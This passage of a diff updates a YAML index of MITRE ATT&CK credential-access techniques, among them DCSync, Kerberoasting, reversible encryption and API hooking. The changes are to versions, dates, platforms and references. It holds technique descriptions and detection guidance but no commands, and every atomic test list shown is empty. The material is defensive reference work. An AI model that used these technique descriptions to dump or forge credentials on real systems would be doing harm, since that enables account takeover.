-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -57540,6 +58247,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -57554,52 +58262,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -57621,6 +58319,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -57631,23 +58330,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -57718,9 +58444,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -57779,12 +58504,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -57816,6 +58540,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -57825,7 +58550,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -57837,111 +58561,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -57952,26 +58614,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -57984,6 +58708,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -58020,17 +58745,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -58076,81 +58801,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -58163,28 +58817,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
